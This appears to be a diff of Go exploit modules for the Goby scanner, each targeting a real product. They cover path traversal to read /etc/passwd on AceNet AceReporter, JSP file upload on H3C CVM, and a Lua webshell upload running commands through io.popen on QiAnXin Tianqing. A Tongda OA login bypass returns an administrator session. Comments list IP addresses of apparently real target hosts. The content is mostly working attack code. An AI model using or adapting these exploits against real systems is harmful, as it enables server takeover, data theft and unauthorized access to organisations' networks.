Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
-
1 + package exploits 2 + 3 + import ( 4 + "git.gobies.org/goby/goscanner/goutils" 5 + ) 6 + 7 + func init() { 8 + expJson := `{ 9 + "Name": "AceNet AceReporter Report component Arbitrary file download", 10 + "Description": "All firewall devices that use the AceNet AceReporter report component can download arbitrary files", 11 + "Product": "AceNet AceReporter Report component", 12 + "Homepage": "", 13 + "DisclosureDate": "2021-08-04", 14 + "Author": "[email protected]", 15 + "GobyQuery": "title=\"Login @ Reporter\" || title=\"Technology, Inc.\"", 16 + "Level": "2", 17 + "Impact": "<p><span style=\"font-size: 14px;\">The vulnerability of arbitrary file download or read is mainly caused by the fact that when the application system provides the function of file download or read, the application system directly specifies the file path in the file path parameter without verifying the validity of the file path. As a result, the attacker can jump through the directory (..</span><span style=\"font-size: 14px;\">\\ or..</span><span style=\"font-size: 14px;\">/) to download or read a file beyond the original specified path.</span><span style=\"font-size: 14px;\">The attacker can finally download or read any files on the system through this vulnerability, such as database files, application system source code, password configuration information and other important sensitive information, resulting in sensitive information leakage of the system.</span><br></p>", 18 + "Recommandation": "<p><span style=\"font-size: 14px;\">Limit ..</span><span style=\"font-size: 14px;\">/ symbol is used to determine the input path when the file is downloaded. The best method is that the file should be one to one in the database, and avoid entering the absolute path to obtain the file</span><br></p>", 19 + "References": [ 20 + "https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972" 21 + ], 22 + "HasExp": true, 23 + "ExpParams": [ 24 + { 25 + "name": "path", 26 + "type": "createSelect", 27 + "value": "../../../../../../../../../etc/passwd,../../../../../../../../../etc/hosts", 28 + "show": "" 29 + } 30 + ], 31 + "ExpTips": { 32 + "Type": "", 33 + "Content": "" 34 + }, 35 + "ScanSteps": [ 36 + "AND", 37 + { 38 + "Request": { 39 + "method": "GET", 40 + "uri": "/view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename=data.txt", 41 + "follow_redirect": true, 42 + "header": {}, 43 + "data_type": "text", 44 + "data": "" 45 + }, 46 + "ResponseTest": { 47 + "type": "group", 48 + "operation": "AND", 49 + "checks": [ 50 + { 51 + "type": "item", 52 + "variable": "$body", 53 + "operation": "contains", 54 + "value": "root", 55 + "bz": "" 56 + }, 57 + { 58 + "type": "item", 59 + "variable": "$body", 60 + "operation": "contains", 61 + "value": "daemon", 62 + "bz": "" 63 + } 64 + ] 65 + }, 66 + "SetVariable": [] 67 + }, 68 + { 69 + "Request": { 70 + "method": "GET", 71 + "uri": "/view/action/download_file.php?filename=../../../../../../../../../etc/hosts&savename=data.txt", 72 + "follow_redirect": true, 73 + "header": {}, 74 + "data_type": "text", 75 + "data": "" 76 + }, 77 + "ResponseTest": { 78 + "type": "group", 79 + "operation": "AND", 80 + "checks": [ 81 + { 82 + "type": "item", 83 + "variable": "$code", 84 + "operation": "==", 85 + "value": "200", 86 + "bz": "" 87 + }, 88 + { 89 + "type": "item", 90 + "variable": "$body", 91 + "operation": "contains", 92 + "value": "127.0.0.1", 93 + "bz": "" 94 + } 95 + ] 96 + }, 97 + "SetVariable": [] 98 + } 99 + ], 100 + "ExploitSteps": [ 101 + "AND", 102 + { 103 + "Request": { 104 + "method": "GET", 105 + "uri": "/view/action/download_file.php?filename={{{path}}}&savename=data.txt", 106 + "follow_redirect": true, 107 + "header": {}, 108 + "data_type": "text", 109 + "data": "" 110 + }, 111 + "SetVariable": [ 112 + "output|lastbody" 113 + ] 114 + } 115 + ], 116 + "Tags": [ 117 + "file download" 118 + ], 119 + "CVEIDs": null, 120 + "CVSSScore": "0.0", 121 + "AttackSurfaces": { 122 + "Application": null, 123 + "Support": null, 124 + "Service": null, 125 + "System": null, 126 + "Hardware": null 127 + } 128 + }` 129 + 130 + ExpManager.AddExploit(NewExploit( 131 + goutils.GetFileName(), 132 + expJson, 133 + nil, 134 + nil, 135 + )) 136 + } 137 + -
-
1 + package exploits 2 + 3 + import ( 4 + "git.gobies.org/goby/goscanner/goutils" 5 + "git.gobies.org/goby/goscanner/jsonvul" 6 + "git.gobies.org/goby/goscanner/scanconfig" 7 + "git.gobies.org/goby/httpclient" 8 + "strings" 9 + ) 10 + 11 + func init() { 12 + expJson := `{ 13 + "Name": "H3C CVM Arbitrary File Upload Vulnerability", 14 + "Description": "<p><span style=\"color: var(--primaryFont-color);\">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style=\"color: var(--primaryFont-color);\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>", 15 + "Product": "H3C-CVM", 16 + "Homepage": "http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/", 17 + "DisclosureDate": "2022-05-25", 18 + "Author": "[email protected]", 19 + "FofaQuery": " server=\"H3C-CVM\" || (banner=\"H3C-CVM\" && banner=\"Server: \")", 20 + "GobyQuery": " server=\"H3C-CVM\" || (banner=\"H3C-CVM\" && banner=\"Server: \")", 21 + "Level": "3", 22 + "Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>", 23 + "Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>", 24 + "References": [ 25 + "https://fofa.so/" 26 + ], 27 + "Is0day": false, 28 + "HasExp": true, 29 + "ExpParams": [ 30 + { 31 + "name": "fileName", 32 + "type": "input", 33 + "value": "evil", 34 + "show": "" 35 + }, 36 + { 37 + "name": "fileContent", 38 + "type": "input", 39 + "value": "<%out.println(\"123\");%>", 40 + "show": "" 41 + } 42 + ], 43 + "ExpTips": { 44 + "Type": "", 45 + "Content": "" 46 + }, 47 + "ScanSteps": [ 48 + "AND", 49 + { 50 + "Request": { 51 + "method": "GET", 52 + "uri": "/test.php", 53 + "follow_redirect": true, 54 + "header": {}, 55 + "data_type": "text", 56 + "data": "" 57 + }, 58 + "ResponseTest": { 59 + "type": "group", 60 + "operation": "AND", 61 + "checks": [ 62 + { 63 + "type": "item", 64 + "variable": "$code", 65 + "operation": "==", 66 + "value": "200", 67 + "bz": "" 68 + }, 69 + { 70 + "type": "item", 71 + "variable": "$body", 72 + "operation": "contains", 73 + "value": "test", 74 + "bz": "" 75 + } 76 + ] 77 + }, 78 + "SetVariable": [] 79 + } 80 + ], 81 + "ExploitSteps": [ 82 + "AND", 83 + { 84 + "Request": { 85 + "method": "GET", 86 + "uri": "/test.php", 87 + "follow_redirect": true, 88 + "header": {}, 89 + "data_type": "text", 90 + "data": "" 91 + }, 92 + "ResponseTest": { 93 + "type": "group", 94 + "operation": "AND", 95 + "checks": [ 96 + { 97 + "type": "item", 98 + "variable": "$code", 99 + "operation": "==", 100 + "value": "200", 101 + "bz": "" 102 + }, 103 + { 104 + "type": "item", 105 + "variable": "$body", 106 + "operation": "contains", 107 + "value": "test", 108 + "bz": "" 109 + } 110 + ] 111 + }, 112 + "SetVariable": [] 113 + } 114 + ], 115 + "Tags": [ 116 + "Arbitrary File Creation" 117 + ], 118 + "VulType": [ 119 + "Arbitrary File Creation" 120 + ], 121 + "CVEIDs": [ 122 + "" 123 + ], 124 + "CNNVD": [ 125 + "" 126 + ], 127 + "CNVD": [ 128 + "" 129 + ], 130 + "CVSSScore": "8.0", 131 + "Translation": { 132 + "CN": { 133 + "Name": "H3C CVM 前台任意文件上传漏洞", 134 + "Product": "H3C-CVM", 135 + "Description": "<p>H3C 公司依托其强大的技术实力、 产品与服务优势, 以及深入人心的以客户为中心的理念, 为企业数据中心 IaaS 云计算基础架构 提供最优化的虚拟化与云业务运营解决方案。 通过 H3C CAS CVM 虚拟化管理系统实现数据中心虚拟化环境的中央管理控制, 以 简洁的管理界面, 统一管理数据中心内所有的物理资源和虚拟资源, 不仅能提高管理员的管控能力、 简化日常例行工作, 更可降低 IT 环境的复杂度和管理成本。<br></p><p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C CVM 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。</span><br></p>", 136 + "Recommendation": "<p>目前官方尚未发布安全补丁,请关注厂商更新。<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>", 137 + "Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\"><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C CVM</span><span style=\"color: rgb(22, 28, 37); font-size: 16px;\"> </span>存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。</span><br></p>", 138 + "VulType": [ 139 + "⽂件上传" 140 + ], 141 + "Tags": [ 142 + "⽂件上传" 143 + ] 144 + }, 145 + "EN": { 146 + "Name": "H3C CVM Arbitrary File Upload Vulnerability", 147 + "Product": "H3C-CVM", 148 + "Description": "<p><span style=\"color: var(--primaryFont-color);\">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style=\"color: var(--primaryFont-color);\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>", 149 + "Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>", 150 + "Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>", 151 + "VulType": [ 152 + "Arbitrary File Creation" 153 + ], 154 + "Tags": [ 155 + "Arbitrary File Creation" 156 + ] 157 + } 158 + }, 159 + "AttackSurfaces": { 160 + "Application": null, 161 + "Support": null, 162 + "Service": null, 163 + "System": null, 164 + "Hardware": null 165 + } 166 + }` 167 + 168 + exploitUploadFile2398429842 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool { 169 + 170 + // 上传文件 171 + requestConfig := httpclient.NewPostRequestConfig("/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/" + fileName + ".jsp&name=222") 172 + requestConfig.VerifyTls = false 173 + requestConfig.FollowRedirect = false 174 + requestConfig.Header.Store("Content-range", "bytes 0-10/20") 175 + requestConfig.Header.Store("Referer", "http://"+host.HostInfo+"/cas/login") 176 + requestConfig.Data = fileContent 177 + 178 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { 179 + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "\"success\\\":true") { 180 + return true 181 + } 182 + } 183 + 184 + return false 185 + } 186 + 187 + checkUploadFile12312313810923 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool { 188 + 189 + requestConfig := httpclient.NewGetRequestConfig("/" + fileName) 190 + requestConfig.VerifyTls = false 191 + requestConfig.FollowRedirect = false 192 + 193 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { 194 + return resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent) 195 + } 196 + 197 + return false 198 + } 199 + 200 + ExpManager.AddExploit(NewExploit( 201 + goutils.GetFileName(), 202 + expJson, 203 + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 204 + 205 + rand := goutils.RandomHexString(6) 206 + rand2 := goutils.RandomHexString(6) 207 + 208 + if exploitUploadFile2398429842(rand2, "<%out.print(\""+rand+"\");%>", u) { 209 + return checkUploadFile12312313810923("/cas/js/lib/buttons/"+rand2+".jsp", rand, u) 210 + } 211 + 212 + return false 213 + }, 214 + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 215 + 216 + fileContent := ss.Params["fileContent"].(string) 217 + fileName := ss.Params["fileName"].(string) 218 + 219 + if exploitUploadFile2398429842(fileName, fileContent, expResult.HostInfo) { 220 + 221 + expResult.Success = true 222 + expResult.Output = "文件上传已成功,请检查路径:/cas/js/lib/buttons/" + fileName + ".jsp" 223 + } 224 + 225 + return expResult 226 + }, 227 + )) 228 + } 229 + 230 + // http://183.63.173.141:8080/ 231 + // https://60.190.202.42:8443/ 232 + // http://61.53.232.5:28080/ -
1 + package exploits 2 + 3 + import ( 4 + "fmt" 5 + "git.gobies.org/goby/goscanner/goutils" 6 + "git.gobies.org/goby/goscanner/jsonvul" 7 + "git.gobies.org/goby/goscanner/scanconfig" 8 + "git.gobies.org/goby/httpclient" 9 + "strings" 10 + ) 11 + 12 + func init() { 13 + expJson := `{ 14 + "Name": "QiAnXin Tianqing terminal security management system client_upload_file.json getshell", 15 + "Description": "There is an arbitrary file upload vulnerability in QiAnXin Tianqing terminal security management system, and the attacker can upload his own webshell to control the server.", 16 + "Product": "360-TianQing", 17 + "Homepage": "https://www.qianxin.com/product/detail/pid/49", 18 + "DisclosureDate": "2021-04-09", 19 + "Author": "[email protected]", 20 + "FofaQuery": "app=\"360-TianQing\"", 21 + "GobyQuery": "app=\"360-TianQing\"", 22 + "Level": "3", 23 + "Impact": "", 24 + "Recommendation": "", 25 + "References": [ 26 + "http://fofa.so" 27 + ], 28 + "HasExp": true, 29 + "ExpParams": [ 30 + { 31 + "name": "cmd", 32 + "type": "input", 33 + "value": "whoami" 34 + } 35 + ], 36 + "ExpTips": { 37 + "Type": "", 38 + "Content": "" 39 + }, 40 + "ScanSteps": [ 41 + "AND", 42 + { 43 + "Request": { 44 + "data": "", 45 + "data_type": "text", 46 + "follow_redirect": true, 47 + "method": "GET", 48 + "uri": "/" 49 + }, 50 + "ResponseTest": { 51 + "checks": [ 52 + { 53 + "bz": "", 54 + "operation": "==", 55 + "type": "item", 56 + "value": "200", 57 + "variable": "$code" 58 + } 59 + ], 60 + "operation": "AND", 61 + "type": "group" 62 + } 63 + } 64 + ], 65 + "ExploitSteps": null, 66 + "Tags": ["getshell"], 67 + "CVEIDs": null, 68 + "CVSSScore": "0.0", 69 + "AttackSurfaces": { 70 + "Application": ["360-TianQing"], 71 + "Support": null, 72 + "Service": null, 73 + "System": null, 74 + "Hardware": null 75 + } 76 + }` 77 + 78 + ExpManager.AddExploit(NewExploit( 79 + goutils.GetFileName(), 80 + expJson, 81 + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 82 + randomFilename := goutils.RandomHexString(4) 83 + cfg := httpclient.NewPostRequestConfig(fmt.Sprintf("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=3cb95cfbe1035bce8c448fcaf80fe7d9&filename=../../lua/%s.LUAC", randomFilename)) 84 + cfg.VerifyTls = false 85 + cfg.FollowRedirect = false 86 + cfg.Header.Store("Referer", u.FixedHostInfo) 87 + cfg.Header.Store("Cookie", "SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B") 88 + cfg.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ") 89 + cfg.Data = "------WebKitFormBoundaryLx7ATxHThfk91oxQ\r\n" 90 + cfg.Data += "Content-Disposition: form-data; name=\"file\"; filename=\"flash.php\"\r\n" 91 + cfg.Data += "Content-Type: application/xxxx\r\n\r\n" 92 + cfg.Data += "hello,world\r\n" 93 + cfg.Data += "------WebKitFormBoundaryLx7ATxHThfk91oxQ--" 94 + if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil && resp.StatusCode == 200 { 95 + return strings.Contains(resp.Utf8Html, "\"status\":true") && 96 + strings.Contains(resp.Utf8Html, "upload file success") 97 + } 98 + return false 99 + }, 100 + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 101 + randomFilename := goutils.RandomHexString(4) 102 + cfg := httpclient.NewPostRequestConfig(fmt.Sprintf("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/%s.LUAC", randomFilename)) 103 + //cfg := httpclient.NewPostRequestConfig("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/sky.LUAC") 104 + cfg.VerifyTls = false 105 + cfg.FollowRedirect = false 106 + cfg.Header.Store("Referer", expResult.HostInfo.FixedHostInfo) 107 + cfg.Header.Store("Cookie", "SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B") 108 + cfg.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ") 109 + cfg.Data = "------WebKitFormBoundaryLx7ATxHThfk91oxQ\r\n" 110 + cfg.Data += "Content-Disposition: form-data; name=\"file\"; filename=\"flash.php\"\r\n" 111 + cfg.Data += "Content-Type: application/xxxx\r\n\r\n" 112 + cfg.Data += "if ngx.req.get_uri_args().cmd then\r\n" 113 + cfg.Data += "cmd = ngx.req.get_uri_args().cmd\r\n" 114 + cfg.Data += "local t = io.popen(cmd)\r\n" 115 + cfg.Data += "local a = t:read(\"*all\")\r\n" 116 + cfg.Data += "ngx.say(a)\r\n" 117 + cfg.Data += "end\r\n" 118 + cfg.Data += "------WebKitFormBoundaryLx7ATxHThfk91oxQ--" 119 + httpclient.DoHttpRequest(expResult.HostInfo, cfg) 120 + cmd := ss.Params["cmd"].(string) 121 + if resp, err := httpclient.SimpleGet(expResult.HostInfo.FixedHostInfo + fmt.Sprintf("/api/%s.json?cmd=%s", randomFilename, cmd)); err == nil && resp.StatusCode == 200 { 122 + expResult.Success = true 123 + expResult.Output = resp.Utf8Html 124 + } 125 + return expResult 126 + }, 127 + )) 128 + } 129 + -
-
-
1 + package exploits 2 + 3 + import ( 4 + "git.gobies.org/goby/goscanner/goutils" 5 + "git.gobies.org/goby/goscanner/jsonvul" 6 + "git.gobies.org/goby/goscanner/scanconfig" 7 + "git.gobies.org/goby/httpclient" 8 + "regexp" 9 + "strings" 10 + ) 11 + 12 + func init() { 13 + expJson := `{ 14 + "Name": "Tongda OA Arbitrary User Login Vulnerability", 15 + "Description": "<p><span style=\"color: var(--primaryFont-color);\">Tongda OA (Office Anywhere Network Intelligent Office System) is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., Ltd. It is a comprehensive management office platform formed by combining with Chinese enterprise management practices.</span><br></p><p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\"></span><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.</span><br></p>", 16 + "Product": "Tongda-OA", 17 + "Homepage": "https://www.tongda2000.com/", 18 + "DisclosureDate": "2021-05-20", 19 + "Author": "[email protected]", 20 + "FofaQuery": "body=\"/static/templates/2013_01/index.css/\" || body=\"javascript:document.form1.UNAME.focus()\" || body=\"href=\\\"/static/images/tongda.ico\\\"\" || body=\"<link rel=\\\"shortcut icon\\\" href=\\\"/images/tongda.ico\\\" />\" || (body=\"OA提示:不能登录OA\" && body=\"紧急通知:今日10点停电\") || title=\"Office Anywhere 2013\" || title=\"Office Anywhere 2015\" || (body=\"tongda.ico\" && (title=\"OA\" || title=\"办公\")) || body=\"class=\\\"STYLE1\\\">新OA办公系统\"", 21 + "GobyQuery": "body=\"/static/templates/2013_01/index.css/\" || body=\"javascript:document.form1.UNAME.focus()\" || body=\"href=\\\"/static/images/tongda.ico\\\"\" || body=\"<link rel=\\\"shortcut icon\\\" href=\\\"/images/tongda.ico\\\" />\" || (body=\"OA提示:不能登录OA\" && body=\"紧急通知:今日10点停电\") || title=\"Office Anywhere 2013\" || title=\"Office Anywhere 2015\" || (body=\"tongda.ico\" && (title=\"OA\" || title=\"办公\")) || body=\"class=\\\"STYLE1\\\">新OA办公系统\"", 22 + "Level": "3", 23 + "Impact": "<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.</span><br></p>", 24 + "Recommendation": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\"></span><a href=\"https://www.tongda2000.com/\" target=\"_blank\"><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Please follow the manufacturer's website to update it in time. </span>https://www.tongda2000.com/</a><br></p>", 25 + "References": [ 26 + "https://fofa.so/" 27 + ], 28 + "Is0day": true, 29 + "HasExp": true, 30 + "ExpParams": [], 31 + "ExpTips": { 32 + "Type": "", 33 + "Content": "" 34 + }, 35 + "ScanSteps": [ 36 + "AND", 37 + { 38 + "Request": { 39 + "method": "GET", 40 + "uri": "/", 41 + "follow_redirect": true, 42 + "header": {}, 43 + "data_type": "text", 44 + "data": "" 45 + }, 46 + "ResponseTest": { 47 + "type": "group", 48 + "operation": "AND", 49 + "checks": [ 50 + { 51 + "type": "item", 52 + "variable": "$code", 53 + "operation": "==", 54 + "value": "200", 55 + "bz": "" 56 + } 57 + ] 58 + }, 59 + "SetVariable": [] 60 + } 61 + ], 62 + "ExploitSteps": [ 63 + "AND", 64 + { 65 + "Request": { 66 + "method": "GET", 67 + "uri": "", 68 + "follow_redirect": true, 69 + "header": {}, 70 + "data_type": "text", 71 + "data": "" 72 + }, 73 + "ResponseTest": { 74 + "type": "group", 75 + "operation": "AND", 76 + "checks": [ 77 + { 78 + "type": "item", 79 + "variable": "$code", 80 + "operation": "==", 81 + "value": "200", 82 + "bz": "" 83 + } 84 + ] 85 + }, 86 + "SetVariable": [] 87 + } 88 + ], 89 + "Tags": [ 90 + "Login Bypass" 91 + ], 92 + "VulType": [ 93 + "Login Bypass" 94 + ], 95 + "CVEIDs": [ 96 + "" 97 + ], 98 + "CNNVD": [ 99 + "" 100 + ], 101 + "CNVD": [ 102 + "" 103 + ], 104 + "CVSSScore": "9.0", 105 + "Translation": { 106 + "CN": { 107 + "Name": "通达 OA 任意用户登陆漏洞", 108 + "Product": "通达-OA", 109 + "Description": "<p>通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。<br></p><p>通达存在任意用户登陆漏洞,攻击者可以通过指定接口登陆任意用户,获取后台管理权限,直接登录后台进行敏感操作。</p>", 110 + "Recommendation": "<p>请联系官方厂商进行更新。<a href=\"https://www.tongda2000.com/\" target=\"_blank\">https://www.tongda2000.com/</a><br></p>", 111 + "Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">通达存在任意用户登陆漏洞,攻击者可以通过指定接口登陆任意用户,获取后台管理权限,直接登录后台进行敏感操作。</span><br></p>", 112 + "VulType": [ 113 + "登录绕过" 114 + ], 115 + "Tags": [ 116 + "登录绕过" 117 + ] 118 + }, 119 + "EN": { 120 + "Name": "Tongda OA Arbitrary User Login Vulnerability", 121 + "Product": "Tongda-OA", 122 + "Description": "<p><span style=\"color: var(--primaryFont-color);\">Tongda OA (Office Anywhere Network Intelligent Office System) is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., Ltd. It is a comprehensive management office platform formed by combining with Chinese enterprise management practices.</span><br></p><p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\"></span><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.</span><br></p>", 123 + "Recommendation": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\"></span><a href=\"https://www.tongda2000.com/\" target=\"_blank\"><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Please follow the manufacturer's website to update it in time. </span>https://www.tongda2000.com/</a><br></p>", 124 + "Impact": "<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.</span><br></p>", 125 + "VulType": [ 126 + "Login Bypass" 127 + ], 128 + "Tags": [ 129 + "Login Bypass" 130 + ] 131 + } 132 + }, 133 + "AttackSurfaces": { 134 + "Application": null, 135 + "Support": null, 136 + "Service": null, 137 + "System": null, 138 + "Hardware": null 139 + } 140 + }` 141 + 142 + checkIsTongdaOA1231234 := func(host *httpclient.FixUrl) bool { 143 + requestConfig := httpclient.NewGetRequestConfig("/inc/expired.php") 144 + requestConfig.VerifyTls = false 145 + requestConfig.FollowRedirect = false 146 + 147 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { 148 + return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "tongda") 149 + } 150 + return false 151 + } 152 + 153 + getTongdaCodeUID435345 := func(host *httpclient.FixUrl) string { 154 + requestConfig := httpclient.NewGetRequestConfig("/ispirit/login_code.php") 155 + requestConfig.VerifyTls = false 156 + requestConfig.FollowRedirect = false 157 + 158 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { 159 + if resp.StatusCode == 200 && strings.Contains(resp.RawBody, "\"codeuid\"") { 160 + return regexp.MustCompile(`\{"codeuid":"\{(.*?)}"`).FindStringSubmatch(resp.RawBody)[1] 161 + } 162 + } 163 + return "" 164 + } 165 + 166 + getTongdaPHPSESSID4564234 := func(codeuid string, host *httpclient.FixUrl) string { 167 + requestConfig := httpclient.NewPostRequestConfig("/logincheck_code.php") 168 + requestConfig.VerifyTls = false 169 + requestConfig.FollowRedirect = false 170 + requestConfig.Header.Store("Content-type", "application/x-www-form-urlencoded") 171 + requestConfig.Data = "UID=1&CODEUID=_PC{" + codeuid + "}" 172 + 173 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { 174 + if resp.StatusCode == 200 && strings.Contains(resp.RawBody, "\"status\":1") && strings.Contains(resp.RawBody, "\"url\":\"general") && strings.Contains(resp.HeaderString.String(), "Set-Cookie: PHPSESSID=") { 175 + return regexp.MustCompile(`Set-Cookie: PHPSESSID=(.*?);`).FindStringSubmatch(resp.HeaderString.String())[1] 176 + } 177 + } 178 + return "" 179 + } 180 + 181 + exploitTongda45321 := func(phpsessionid string, host *httpclient.FixUrl) bool { 182 + // 攻击 URL 183 + requestConfig := httpclient.NewGetRequestConfig("/general/") 184 + requestConfig.VerifyTls = false 185 + requestConfig.FollowRedirect = false 186 + requestConfig.Timeout = 15 187 + requestConfig.Header.Store("Cookie", "PHPSESSID="+phpsessionid) 188 + 189 + // 发送攻击请求 190 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { 191 + return resp.StatusCode == 302 && strings.Contains(resp.Utf8Html, "tongdainfo") 192 + } 193 + return false 194 + } 195 + 196 + ExpManager.AddExploit(NewExploit( 197 + goutils.GetFileName(), 198 + expJson, 199 + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 200 + if checkIsTongdaOA1231234(u) { 201 + codeuid := getTongdaCodeUID435345(u) 202 + if codeuid != "" { 203 + phpsessionid := getTongdaPHPSESSID4564234(codeuid, u) 204 + if phpsessionid != "" { 205 + return exploitTongda45321(phpsessionid, u) 206 + } 207 + } 208 + } 209 + 210 + return false 211 + }, 212 + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 213 + 214 + if checkIsTongdaOA1231234(expResult.HostInfo) { 215 + codeuid := getTongdaCodeUID435345(expResult.HostInfo) 216 + if codeuid != "" { 217 + phpsessionid := getTongdaPHPSESSID4564234(codeuid, expResult.HostInfo) 218 + if phpsessionid != "" { 219 + if exploitTongda45321(phpsessionid, expResult.HostInfo) { 220 + expResult.Success = true 221 + expResult.Output = "登陆成功,使用如下 session 即可登陆:" + phpsessionid 222 + } 223 + } 224 + } 225 + } 226 + 227 + return expResult 228 + }, 229 + )) 230 + } 231 + 232 + // http://14.18.236.21:8000/ -
